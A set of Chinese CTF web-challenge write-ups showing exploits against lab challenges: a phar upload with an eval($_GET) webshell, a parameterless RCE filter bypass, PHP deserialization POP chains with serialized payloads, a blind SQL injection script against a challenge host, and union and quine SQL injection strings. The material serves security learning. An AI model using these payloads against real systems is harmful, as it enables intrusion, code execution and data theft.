[NISACTF 2022]bingdundun~
bingdundun 处感觉像文件包含，把 upload 改成 index 试一下
发现确实是文件包含，猜测后端会自动补一个 .php 后缀
那么常规的文件包含就不行了；页面还有一个文件上传功能，于是考虑 phar:// 协议
<?php
// Builds a minimal phar archive on disk (creating one needs phar.readonly=0).
// As a plain uploaded file the archive is inert; its entries only execute when
// a server-side include resolves a path through the phar:// stream wrapper.
// That is the defender's lever: an include sink that rejects stream wrappers
// (or resolves against a fixed directory) is not helped by extension checks
// at upload time, since the archive's own name is irrelevant to the wrapper.
$phar = new Phar("test.phar");
$phar->startBuffering();
// Stub: the archive starts as an empty PHP file that halts immediately.
$phar->setStub("<?php __HALT_COMPILER();");
// One entry named test.php whose body is the writeup's payload
// (an eval() over a GET parameter).
$phar->addFromString("test.php",'<?php eval($_GET[1]);?>');
// Flushes the buffered archive to test.phar.
$phar->stopBuffering();
把生成的 phar 文件改成 .zip 后缀后上传
[HDCTF 2023]Welcome To HDCTF 2023
死了也行，flag 是直接给的
[NISACTF 2022]midlevel
Smarty ssti
感觉刚做过
[GKCTF 2020]cve版签到
[GXYCTF 2019]BabyUpload
.htaccess
常规的命令执行函数都被 ban 了
用无参 RCE 的方式列一下根目录的文件，看看 flag 叫什么名字
// Parameterless call chain: every call consumes only the previous call's
// return value, so nothing here is a literal argument for a filter to match.
// set_include_path() returns the *previous* include_path string; str_split(),
// array_flip() and array_rand() pick one random character of it, and scandir()
// lists that path — which is the root directory whenever the picked character
// is a '/' (the default include_path usually contains one).
// The filter this gets past bans command-execution functions by name; removing
// or allow-listing the dynamic-call sink would close the whole class instead.
scandir(array_rand(array_flip(str_split(set_include_path(dirname(dirname(dirname(getcwd()))))))));
就叫 flag，那直接读就行
[NSSCTF 2022 Spring Recruit]babyphp
[GDOUCTF 2023]EZ WEB
[NISACTF 2022]popchains
<?php
// Entry point: the raw GET parameter goes straight into unserialize(), so any
// class in this file that defines a magic method is reachable through a
// crafted object graph. The '@' also hides the warnings a malformed payload
// would otherwise leave in the logs.
if (isset($_GET['wish'])) {
    @unserialize($_GET['wish']);
}

class Road_is_Long
{
    public $page;
    public $string;

    public function __construct($file = 'index.php')
    {
        $this->page = $file;
    }

    // 3 — runs when an instance is coerced to string; reads ->page off
    // whatever ->string holds (an object lacking that property lands in __get()).
    public function __toString()
    {
        return $this->string->page;
    }

    public function __wakeup()
    {
        // preg_match() needs a string, so an object stored in ->page is
        // converted via its __toString() before the deny-list is evaluated:
        // the guard itself is what starts the chain.
        if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            // 4 — the deny-list only rewrites ->page after the match.
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard
{
    protected $var;

    public function __construct($var)
    {
        $this->var = $var;
    }

    // 0 — the sink: include() of a value that came out of unserialize().
    public function append($value)
    {
        include($value);
    }

    // 1 — calling the object as a function feeds ->var into the sink.
    public function __invoke()
    {
        $this->append($this->var);
    }
}

class Make_a_Change
{
    public $effort;

    public function __construct()
    {
        $this->effort = array();
    }

    // 2 — any read of an undefined property invokes ->effort as a callable
    // (a Try_Work_Hard instance satisfies that through __invoke()).
    public function __get($key)
    {
        $function = $this->effort;
        return $function();
    }
}
// Assemble the object graph the challenge's magic methods allow, innermost
// link first:
//   Try_Work_Hard::__invoke  -> include('/flag')
//   Make_a_Change::__get     -> calls ->effort as a function
//   Road_is_Long::__toString -> reads ->string->page
//   Road_is_Long::__wakeup   -> preg_match() stringifies ->page
// Construction order has no effect on serialize() output; only the property
// values and the declared property order of each class do.
$T = new Try_Work_Hard('/flag');

$M = new Make_a_Change();
$M->effort = $T;

$R = new Road_is_Long();
$R->string = $M;

$p = new Road_is_Long();
$p->page = $R;

echo urlencode(serialize($p)) . "\n";
O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D
[CISCN 2019华北Day2]Web1
import requests

# Boolean-based blind extraction against the writeup's challenge instance.
# The fixed greeting in the response body is the true/false oracle; each
# character of flag.flag is found by binary search over ASCII 33..130.
# Server-side this shows up as a burst of POSTs whose 'id' value differs only
# in the two integers substituted below. Parameterised queries remove the
# oracle entirely; until then, the repeated parameter shape is the thing to
# alert on.
url = 'http://node2.anna.nssctf.cn:28640//index.php'
flag = ''
for i in range(1, 100):  # 1-based character position, as substr() expects
    s = 33   # lower bound of the search window
    e = 130  # upper bound of the search window
    mid = (e + s) >> 1
    while True:
        payload = {'id': 'if(ascii(substr((select(flag)from(flag)),{},1))>{},1,0)'.format(i, mid)}
        res = requests.post(url=url, data=payload).text
        if 'Hello, glzjin wants a girlfriend.' in res:
            s = mid  # presumably the greeting means the comparison yielded 1
        else:
            e = mid
        mid = (e + s) >> 1
        if (e - s) <= 1:
            flag += chr(e)
            print(flag)
            break
    if '}' in flag:  # closing brace of the flag format ends the loop
        break
[NSSRound#1 Basic]basic_check
一开始无从下手，看 WP 才知道服务端允许 PUT 方法，可以直接写入 webshell
[HCTF 2018]Warmup
[HNCTF 2022 Week1]2048
[LitCTF 2023]Http pro max plus
[GDOUCTF 2023]泄露的伪装
[HNCTF 2022 Week1]Interesting_include
[第五空间 2021]pklovecloud
<?php
include 'flag.php';

class pkshow
{
    function echo_name()
    {
        return "Pk very safe^.^";
    }
}

class acp
{
    protected $cinder;
    public $neutron;
    public $nova;

    function __construct($p)
    {
        $this->cinder = $p;
    }

    // String coercion delegates to whatever object ->cinder holds, as long as
    // it has an echo_name(); the type is never checked, so ace qualifies.
    function __toString()
    {
        if (isset($this->cinder)) return $this->cinder->echo_name();
    }
}

class ace
{
    public $filename;
    public $openstack;
    public $docker;

    public function __construct()
    {
        $this->filename = '../../../../../nssctfasdasdflag';
    }

    function echo_name()
    {
        // A second unserialize() on another property. ->docker is never
        // assigned anywhere in this file, so in the writeup's payload it is null.
        $this->openstack = unserialize($this->docker);
        // $heat is undefined in this scope, so ->neutron is assigned null;
        // NOTE(review): presumably ->nova is also unset on whatever
        // unserialize() produced, which is what makes the strict comparison
        // below hold — confirm against the PHP version in use.
        $this->openstack->neutron = $heat;
        if ($this->openstack->neutron === $this->openstack->nova) {
            // Relative to the current directory with no normalisation, so the
            // '..' segments in ->filename walk outside it.
            $file = "./{$this->filename}";
            if (file_get_contents($file)) {
                return file_get_contents($file);
            } else {
                return "keystone lost~";
            }
        }
    }
}

// Payload assembly: an acp wrapping an ace, so that stringifying the acp
// reaches ace::echo_name() and its file read.
$ACE = new ace();
$pop = new acp($ACE);
echo urlencode(serialize($pop));
[鹤城杯 2021]Middle magic
[GKCTF 2021]easycms
弱口令：admin / 12345
蝉知 7.7，网上搜已公开的漏洞
然后尝试复现。我当时做的时候可以执行 whoami，但没做完就去干别的了；过几天回来再做，RCE 这个漏洞就复现不了了
那就按别人 WP 里写的，改用任意文件下载
?m=ui&f=downloadtheme&theme=L2ZsYWc=
[SWPUCTF 2022 新生赛]ez_rce
getshell
直接读flag读不到
搜一下flag
# Locate the flag file by name, then print every regular-file match.
find / -name "flag"
find / -name "flag" -type f -exec cat {} \;
[羊城杯 2020]easycon
base64解码得到flag
[LitCTF 2023]这是什么?SQL !注一下 !
-1))))))union select 1,group_concat(flag)from ctftraining.flag%23
[第五空间 2021]yet_another_mysql_injection
admin admin 爆hacker
然后我在这里手工测了一会，没什么思路
右键看源码
然后跟进/?source
意思是传入的 password 要和查询出来的 password 完全相同，也就是 quine 注入
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
看wp发现第二种做法
phpmyadmin
弱口令 admin admin
登录就行了